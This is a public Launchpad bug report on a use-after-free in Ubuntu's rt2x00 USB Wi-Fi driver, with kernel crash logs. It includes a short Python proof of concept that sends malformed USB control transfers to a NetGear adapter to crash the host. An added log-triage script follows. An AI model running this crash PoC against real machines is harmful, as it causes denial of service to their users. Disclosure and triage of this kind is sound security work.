This issue was reported publicly to https://lore.kernel.org/linux-wireless/caov16xesck0-smenjfxvwikqogbj4pqwa2dvjbvwq-g+ntv...@mail.gmail.com/T/#u
Therefore, I am making this bug report public as well. The new report claims that "Debian systems are not affected." If Ubuntu is truly the only distro affected, the Canonical CNA can assign a CVE. Otherwise, CVE assignment should be made by upstream, MITRE, or a Root CNA like Red Hat. To restate this, it is not known if Ubuntu is an affected downstream of this vulnerability or if the issue truly originates in Ubuntu as the upstream provider. My hunch is the prior.

** Information type changed from Private Security to Public Security

-- 
You received this bug notification because you are a member of Kernel Packages, which is subscribed to linux in Ubuntu.
https://bugs.launchpad.net/bugs/2073500

Title:
  Ubuntu RT2x00 USB Driver Kernel Use-After-Free Vulnerability

Status in linux package in Ubuntu:
  New

Bug description:
  Description:
  While performing USB interface fuzzing tests on a NetGear WNDA4100 network card (Bus 001 Device 018: ID 0846:9013), I observed a system crash on multiple PCs running Ubuntu 22.04. The issue appears to be related to the USB drivers or kernel handling of the device, as indicated by the kernel logs.

  Impact:
  Affected systems include Ubuntu 22.04 running on different hardware configurations with the NetGear WNDA4100 network card. This vulnerability may allow an attacker to trigger a system crash through the USB interface, leading to denial of service.

  Reproduction Steps:
  1. Connect the NetGear WNDA4100 network card (ID 0846:9013) to a system running Ubuntu 22.04.
  2. Run the provided fuzzing script to interact with the USB interface of the network card.
  3. Observe the system behavior and check for crashes or instability.
  Logs and Error Messages:
  The following are excerpts from the kernel log during the crash:

[ +0.351900] ------------[ cut here ]------------
[ +0.000003] WARNING: CPU: 3 PID: 0 at kernel/time/timer.c:1738 __run_timers+0x2dd/0x310
[ +0.000007] Modules linked in: veth xt_nat xt_tcpudp xt_conntrack nft_chain_nat xt_MASQUERADE nf_nat nf_conntrack_netlink nf_conntrack nf_defrag_ipv6 nf_defrag_ipv4 xfrm_user tls xfrm_algo xt_addrtype nft_compat nf_tables libcrc32c nfnetlink br_netfilter bridge stp llc ccm snd_hda_codec_hdmi snd_hda_codec_realtek snd_hda_codec_generic snd_sof_pci_intel_tgl snd_sof_intel_hda_common soundwire_intel snd_sof_intel_hda_mlink soundwire_cadence snd_sof_intel_hda snd_sof_pci intel_uncore_frequency snd_sof_xtensa_dsp intel_uncore_frequency_common joydev overlay snd_sof snd_sof_utils snd_soc_hdac_hda snd_hda_ext_core snd_soc_acpi_intel_match snd_soc_acpi soundwire_generic_allocation soundwire_bus snd_soc_core snd_compress ac97_bus snd_pcm_dmaengine snd_hda_intel snd_intel_dspcfg snd_intel_sdw_acpi x86_pkg_temp_thermal snd_hda_codec intel_powerclamp coretemp snd_hda_core snd_hwdep snd_pcm kvm_intel snd_seq_midi i915 kvm snd_seq_midi_event rt2800usb snd_rawmidi uvcvideo irqbypass iwlmvm rt2x00usb crct10dif_pclmul rt2800lib
[ +0.000034]  polyval_clmulni videobuf2_vmalloc polyval_generic drm_buddy uvc ghash_clmulni_intel rt2x00lib videobuf2_memops sha256_ssse3 ttm snd_seq videobuf2_v4l2 sha1_ssse3 aesni_intel binfmt_misc mei_hdcp mei_pxp drm_display_helper crypto_simd videodev snd_seq_device pmt_telemetry cryptd mac80211 iwlwifi pmt_class intel_rapl_msr nls_iso8859_1 cmdlinepart input_leds snd_timer cec rapl huawei_wmi videobuf2_common processor_thermal_device_pci ledtrig_audio spi_nor rc_core processor_thermal_device intel_cstate wmi_bmof sparse_keymap libarc4 serio_raw mc snd cfg80211 drm_kms_helper mei_me mtd processor_thermal_rfim hid_multitouch processor_thermal_mbox i2c_algo_bit mei soundcore processor_thermal_rapl intel_vsec intel_rapl_common int3400_thermal int3403_thermal int340x_thermal_zone acpi_thermal_rel mac_hid acpi_pad sch_fq_codel msr parport_pc ppdev lp parport drm efi_pstore ip_tables x_tables autofs4 hid_generic nvme crc32_pclmul nvme_core spi_intel_pci intel_lpss_pci i2c_i801 spi_intel xhci_pci intel_lpss nvme_common
[ +0.000042]  i2c_smbus xhci_pci_renesas idma64 i2c_hid_acpi i2c_hid video hid wmi pinctrl_tigerlake
[ +0.000005] CPU: 3 PID: 0 Comm: swapper/3 Not tainted 6.5.0-35-generic #35~22.04.1-Ubuntu
[ +0.000002] Hardware name: HONOR GLO-GXXX/GLO-GXXX-PCB, BIOS 1.09 06/27/2023
[ +0.000000] RIP: 0010:__run_timers+0x2dd/0x310
[ +0.000003] Code: 3e 02 48 85 c0 74 0c 48 8b 78 08 4c 89 ee e8 ba cf ff ff 65 ff 0d 2b 1e 44 57 0f 85 38 ff ff ff 0f 1f 44 00 00 e9 2e ff ff ff <0f> 0b e9 0b ff ff ff 41 0f b6 5f 26 80 fb 01 0f 87 44 da ec 00 83
[ +0.000001] RSP: 0018:ffffaedb4048cea0 EFLAGS: 00010046
[ +0.000001] RAX: 0000000000000000 RBX: 0000000000000000 RCX: 0000000000000000
[ +0.000001] RDX: ffffaedb4048ced0 RSI: 00000000ffff7618 RDI: 0000000000000000
[ +0.000001] RBP: ffffaedb4048cf48 R08: 0000000000000000 R09: ffff8e5c8f8e11a8
[ +0.000000] R10: 0000000000000000 R11: 0000000000000000 R12: dead000000000122
[ +0.000001] R13: ffff8e551284a4b0 R14: ffffaedb4048ced0 R15: ffff8e5c8f8e1180
[ +0.000001] FS: 0000000000000000(0000) GS:ffff8e5c8f8c0000(0000) knlGS:0000000000000000
[ +0.000000] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ +0.000001] CR2: 00005785fd8f0000 CR3: 000000026241c000 CR4: 0000000000750ee0
[ +0.000001] PKRU: 55555554
[ +0.000001] Call Trace:
[ +0.000001]  <IRQ>
[ +0.000002]  ? show_regs+0x6d/0x80
[ +0.000003]  ? __warn+0x89/0x160
[ +0.000002]  ? __run_timers+0x2dd/0x310
[ +0.000002]  ? report_bug+0x17e/0x1b0
[ +0.000003]  ? handle_bug+0x46/0x90
[ +0.000002]  ? exc_invalid_op+0x18/0x80
[ +0.000001]  ? asm_exc_invalid_op+0x1b/0x20
[ +0.000004]  ? __run_timers+0x2dd/0x310
[ +0.000002]  run_timer_softirq+0x1d/0x40
[ +0.000002]  __do_softirq+0xd9/0x349
[ +0.000002]  ? hrtimer_interrupt+0x11f/0x250
[ +0.000002]  __irq_exit_rcu+0x75/0xa0
[ +0.000002]  irq_exit_rcu+0xe/0x20
[ +0.000001]  sysvec_apic_timer_interrupt+0x92/0xd0
[ +0.000001]  </IRQ>
[ +0.000001]  <TASK>
[ +0.000000]  asm_sysvec_apic_timer_interrupt+0x1b/0x20
[ +0.000002] RIP: 0010:cpuidle_enter_state+0xda/0x720
[ +0.000001] Code: 16 06 ff e8 a8 f5 ff ff 8b 53 04 49 89 c7 0f 1f 44 00 00 31 ff e8 16 c2 04 ff 80 7d d0 00 0f 85 61 02 00 00 fb 0f 1f 44 00 00 <45> 85 f6 0f 88 f7 01 00 00 4d 63 ee 49 83 fd 09 0f 87 19 05 00 00
[ +0.000001] RSP: 0018:ffffaedb4017fe18 EFLAGS: 00000246
[ +0.000001] RAX: 0000000000000000 RBX: ffffcedb3fac0728 RCX: 0000000000000000
[ +0.000001] RDX: 0000000000000003 RSI: 0000000000000000 RDI: 0000000000000000
[ +0.000000] RBP: ffffaedb4017fe68 R08: 0000000000000000 R09: 0000000000000000
[ +0.000001] R10: 0000000000000000 R11: 0000000000000000 R12: ffffffffaaed1d60
[ +0.000000] R13: 0000000000000002 R14: 0000000000000002 R15: 000000250034e01b
[ +0.000002]  ? cpuidle_enter_state+0xca/0x720
[ +0.000001]  ? finish_task_switch.isra.0+0x85/0x2a0
[ +0.000002]  cpuidle_enter+0x2e/0x50
[ +0.000002]  call_cpuidle+0x23/0x60
[ +0.000002]  cpuidle_idle_call+0x11d/0x190
[ +0.000001]  do_idle+0x82/0xf0
[ +0.000001]  cpu_startup_entry+0x2a/0x30
[ +0.000001]  start_secondary+0x129/0x160
[ +0.000003]  secondary_startup_64_no_verify+0x190/0x19b
[ +0.000003]  </TASK>
[ +0.000000] ---[ end trace 0000000000000000 ]---
[ +0.967206] ieee80211 phy6: rt2800_wait_csr_ready: Error - Unstable hardware
[ +0.000009] ieee80211 phy6: rt2800usb_set_device_state: Error - Device failed to enter state 4 (-5)
[ +0.180377] usb 3-3: reset high-speed USB device number 5 using xhci_hcd
[ +0.160690] ieee80211 phy7: rt2x00_set_rt: Info - RT chipset 3593, rev 0402 detected
[ +0.012183] ieee80211 phy7: rt2x00_set_rf: Info - RF chipset 000d detected
[ +0.000223] ieee80211 phy7: Selected rate control algorithm 'minstrel_ht'
[ +0.001495] rt2800usb 3-3:1.0 wlx100d7f65f855: renamed from wlan0
[ +0.036098] ieee80211 phy7: rt2x00lib_request_firmware: Info - Loading firmware file 'rt2870.bin'
[ +0.000043] ieee80211 phy7: rt2x00lib_request_firmware: Info - Firmware detected - version: 0.36
[ +0.102320] ieee80211 phy7: rt2800_wait_bbp_ready: Error - BBP register access failed, aborting
[ +0.000005] ieee80211 phy7: rt2800usb_set_device_state: Error - Device failed to enter state 4 (-5)
[ +0.194308] usb 3-3: reset high-speed USB device number 5 using xhci_hcd
[ +0.164912] ieee80211 phy8: rt2x00_set_rt: Info - RT chipset 3593, rev 0402 detected
[ +0.011684] ieee80211 phy8: rt2x00_set_rf: Info - RF chipset 000d detected
[ +0.000212] ieee80211 phy8: Selected rate control algorithm 'minstrel_ht'
[ +0.001410] rt2800usb 3-3:1.0 wlx100d7f65f855: renamed from wlan0
[ +0.025662] ieee80211 phy8: rt2x00lib_request_firmware: Info - Loading firmware file 'rt2870.bin'
[ +0.000039] ieee80211 phy8: rt2x00lib_request_firmware: Info - Firmware detected - version: 0.36
[ +0.105379] ieee80211 phy8: rt2800_wait_bbp_ready: Error - BBP register access
failed, aborting
[ +0.000005] ieee80211 phy8: rt2800usb_set_device_state: Error - Device failed to enter state 4 (-5)
[ +0.178163] usb 3-3: reset high-speed USB device number 5 using xhci_hcd
[ +0.157165] ieee80211 phy9: rt2x00_set_rt: Info - RT chipset 3593, rev 0402 detected
[ +0.011625] ieee80211 phy9: rt2x00_set_rf: Info - RF chipset 000d detected
[ +0.000212] ieee80211 phy9: Selected rate control algorithm 'minstrel_ht'
[ +0.001473] rt2800usb 3-3:1.0 wlx100d7f65f855: renamed from wlan0
[ +0.040515] ieee80211 phy9: rt2x00lib_request_firmware: Info - Loading firmware file 'rt2870.bin'
[ +0.000062] ieee80211 phy9: rt2x00lib_request_firmware: Info - Firmware detected - version: 0.36
[ +0.094392] ieee80211 phy9: rt2800_wait_bbp_ready: Error - BBP register access failed, aborting
[ +0.000006] ieee80211 phy9: rt2800usb_set_device_state: Error - Device failed to enter state 4 (-5)
[ +0.178165] usb 3-3: reset high-speed USB device number 5 using xhci_hcd
[ +0.158058] ieee80211 phy10: rt2x00_set_rt: Info - RT chipset 3593, rev 0402 detected
[ +0.012091] ieee80211 phy10: rt2x00_set_rf: Info - RF chipset 000d detected
[ +0.000209] ieee80211 phy10: Selected rate control algorithm 'minstrel_ht'
[ +0.001250] rt2800usb 3-3:1.0 wlx100d7f65f855: renamed from wlan0
[ +0.047440] ieee80211 phy10: rt2x00lib_request_firmware: Info - Loading firmware file 'rt2870.bin'
[ +0.000070] ieee80211 phy10: rt2x00lib_request_firmware: Info - Firmware detected - version: 0.36

  POC:
--------------------------------------------------------------------------------------------------------
import usb.core
import usb.util
import time
import random

# Locate the WNDA4100 by its USB vendor/product ID.
dev = usb.core.find(idVendor=0x0846, idProduct=0x9013)
if dev is None:
    raise ValueError("Device not found")

def send_ctrl_transfer(bmRequestType, bRequest, wValue, wIndex, data_length):
    try:
        # Payload of 0xFF bytes of the requested length.
        data = bytes([0xFF] * data_length)
        #print(f"Sending: bmRequestType={bmRequestType}, bRequest={bRequest}, wValue={wValue}, wIndex={wIndex}, data length={data_length}")
        send = dev.ctrl_transfer(bmRequestType, bRequest, wValue, wIndex, data)
        # pyusb returns the byte count (int) for host-to-device requests and an
        # array for device-to-host ones; handle both so len() does not raise.
        length = send if isinstance(send, int) else len(send)
        print(f"Response length: {length}")
        if length > 300:
            print(f"Received data length > 300: {length}")
            print(f"Sent data: bmRequestType={bmRequestType}, bRequest={bRequest}, wValue={wValue}, wIndex={wIndex}, data length={data_length}")
        return True
    except Exception as e:
        print(f"Error: {e}")
        return False

# (bmRequestType, bRequest, wValue, wIndex, data_length)
requests = [
    (0x00, 0x00, 0x0000, 0x0000, 64),
    (0x00, 0x00, 0x0000, 0x0000, 1024),
    (0x00, 0x00, 0x0000, 0x0000, 2048),
    (0x00, 0x00, 0x0000, 0x0000, 512),
    (0x00, 0x00, 0x0000, 0xFFFF, 64),
    (0x00, 0x00, 0x0000, 0xFFFF, 1024),
    (0x00, 0x00, 0x0000, 0xFFFF, 2048),
    (0x00, 0x00, 0x0000, 0xFFFF, 512),
]

for bmRequestType, bRequest, wValue, wIndex, data_length in requests:
    send_ctrl_transfer(bmRequestType, bRequest, wValue, wIndex, data_length)
    time.sleep(0.1)

# Port reset of the device after the control transfers.
dev.reset()
print("Done sending specified requests.")
---------------------------------------------------------------------------------------

  I was able to reproduce the issue successfully on both Dell Vostro and Honor laptops running Ubuntu 22.04. However, the issue only occurs when a NetGear, Inc. WNDA4100 wireless adapter is plugged in. It is currently unclear whether the problem is due to the NetGear wireless adapter itself or the rt2800 driver, as I do not have additional RT2800 wireless adapters to test with. The vulnerability indeed exists and can cause the local PC to crash completely. I believe it is highly likely that the issue is due to the RT2800 driver.

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/linux/+bug/2073500/+subscriptions

-- 
Mailing list: https://launchpad.net/~kernel-packages
Post to     : kernel-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~kernel-packages
More help   : https://help.launchpad.net/ListHelp
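The following is an added triage helper for reports like the one above; it is not code from the bug report, from Canonical, or from the rt2x00 driver. It parses a trimmed copy of the report's own dmesg excerpt (a constructed sample, embedded inline) and pulls out what a responder wants first: where the WARN fired and on which kernel, which rt2x00-family modules were loaded, whether any register holds a list-poison value (a list entry that was already unlinked is being used, a common use-after-free signature), the reliable frames of the call trace, and how often the USB device was reset and the driver failed to bring it up. The poison constants assume the x86_64 default pointer-poison delta; the regular expressions match the standard dmesg formats shown in the report and nothing else.

```python
import re
from collections import Counter

# x86_64 list-poison values (assumes the default POISON_POINTER_DELTA of
# 0xdead000000000000): LIST_POISON1 = 0x100 + delta, LIST_POISON2 = 0x122 + delta.
LIST_POISON = {"dead000000000100": "LIST_POISON1", "dead000000000122": "LIST_POISON2"}

TS_RE = re.compile(r"^\[\s*\+?[\d.]+\]\s?")            # dmesg timestamp prefix
WARN_RE = re.compile(r"WARNING: CPU: (\d+) PID: (\d+) at (\S+) (\S+)")
CPU_RE = re.compile(r"CPU: \d+ PID: \d+ Comm: (\S+) (Tainted: \S+|Not tainted) (\S+)")
REG_RE = re.compile(r"\b(R[A-Z0-9]{2}|[A-Z]{2}\d?): ([0-9a-f]{16})\b")
FRAME_RE = re.compile(r"^(\? )?([\w.]+\+0x[0-9a-f]+/0x[0-9a-f]+)$")
RESET_RE = re.compile(r"usb (\S+): reset .*USB device number \d+")
DRV_ERR_RE = re.compile(r"ieee80211 phy\d+: (\w+): Error - ")

# Constructed sample: a trimmed copy of the lines quoted in the report.
SAMPLE_DMESG = """\
[ +0.351900] ------------[ cut here ]------------
[ +0.000003] WARNING: CPU: 3 PID: 0 at kernel/time/timer.c:1738 __run_timers+0x2dd/0x310
[ +0.000007] Modules linked in: veth xt_nat rt2800usb snd_rawmidi rt2x00usb rt2800lib
[ +0.000034]  polyval_clmulni rt2x00lib mac80211 cfg80211
[ +0.000005] CPU: 3 PID: 0 Comm: swapper/3 Not tainted 6.5.0-35-generic #35~22.04.1-Ubuntu
[ +0.000000] RIP: 0010:__run_timers+0x2dd/0x310
[ +0.000000] R10: 0000000000000000 R11: 0000000000000000 R12: dead000000000122
[ +0.000001] Call Trace:
[ +0.000001]  <IRQ>
[ +0.000003]  ? __warn+0x89/0x160
[ +0.000004]  ? __run_timers+0x2dd/0x310
[ +0.000002]  run_timer_softirq+0x1d/0x40
[ +0.000002]  __do_softirq+0xd9/0x349
[ +0.000001]  </IRQ>
[ +0.000000] ---[ end trace 0000000000000000 ]---
[ +0.967206] ieee80211 phy6: rt2800_wait_csr_ready: Error - Unstable hardware
[ +0.000009] ieee80211 phy6: rt2800usb_set_device_state: Error - Device failed to enter state 4 (-5)
[ +0.180377] usb 3-3: reset high-speed USB device number 5 using xhci_hcd
[ +0.102320] ieee80211 phy7: rt2800_wait_bbp_ready: Error - BBP register access failed, aborting
[ +0.000005] ieee80211 phy7: rt2800usb_set_device_state: Error - Device failed to enter state 4 (-5)
[ +0.194308] usb 3-3: reset high-speed USB device number 5 using xhci_hcd
"""


def triage(lines):
    """Summarise the first WARN block plus the driver/USB noise around it."""
    s = {"warning": None, "comm": None, "taint": None, "kernel": None,
         "modules": [], "poisoned_regs": {}, "trace": [],
         "usb_resets": Counter(), "driver_errors": Counter()}
    in_block = in_modules = in_trace = False
    for raw in lines:
        line = TS_RE.sub("", raw).strip()
        if "------------[ cut here ]------------" in line:
            in_block = True
            continue
        if line.startswith("---[ end trace"):
            in_block = in_modules = in_trace = False
            continue
        if not in_block:
            if (m := RESET_RE.search(line)):
                s["usb_resets"][m.group(1)] += 1
            elif (m := DRV_ERR_RE.search(line)):
                s["driver_errors"][m.group(1)] += 1
            continue
        if (m := WARN_RE.search(line)):
            s["warning"] = (int(m.group(1)), int(m.group(2)), m.group(3), m.group(4))
        elif line.startswith("Modules linked in:"):
            s["modules"] += line.split(":", 1)[1].split()
            in_modules = True
        elif in_modules and not line.startswith("CPU:"):
            s["modules"] += line.split()            # continuation of the module list
        elif (m := CPU_RE.search(line)):
            in_modules = False
            s["comm"], s["taint"], s["kernel"] = m.groups()
        elif line == "Call Trace:":
            in_trace = True
        elif in_trace and (m := FRAME_RE.match(line)):
            if not m.group(1):                       # skip unreliable "? " frames
                s["trace"].append(m.group(2))
        for reg, val in REG_RE.findall(line):        # register dump lines
            if val in LIST_POISON:
                s["poisoned_regs"][reg] = LIST_POISON[val]
    return s


def findings(s):
    """Human-readable triage points, most decision-relevant first."""
    out = []
    if s["warning"]:
        cpu, pid, loc, sym = s["warning"]
        out.append(f"WARN at {loc} in {sym} on CPU {cpu} (PID {pid} {s['comm']}, "
                   f"{s['kernel']}, {s['taint']})")
    for reg, name in s["poisoned_regs"].items():
        out.append(f"{reg} holds {name}: a list entry that was already list_del()'d "
                   "is being used, a common use-after-free signature")
    wifi = [m for m in s["modules"] if m.startswith(("rt2800", "rt2x00"))]
    if wifi:
        out.append("rt2x00-family modules loaded: " + ", ".join(wifi))
    out += [f"usb {dev} reset {n} time(s)" for dev, n in s["usb_resets"].items()]
    out += [f"{fn} reported an error {n} time(s)" for fn, n in s["driver_errors"].items()]
    if s["trace"]:
        out.append("reliable frames: " + " <- ".join(s["trace"]))
    return out


if __name__ == "__main__":
    for f in findings(triage(SAMPLE_DMESG.splitlines())):
        print("-", f)
```

Run it as `dmesg | python3 triage.py`-style input by replacing `SAMPLE_DMESG.splitlines()` with `sys.stdin`. The LIST_POISON check is the part worth keeping in any oops-triage tooling: a poisoned pointer in a register at the faulting instruction means the kernel touched a list entry after it was unlinked, which is the signal that separates a plain hardware-timeout warning from a memory-safety bug worth a CVE request.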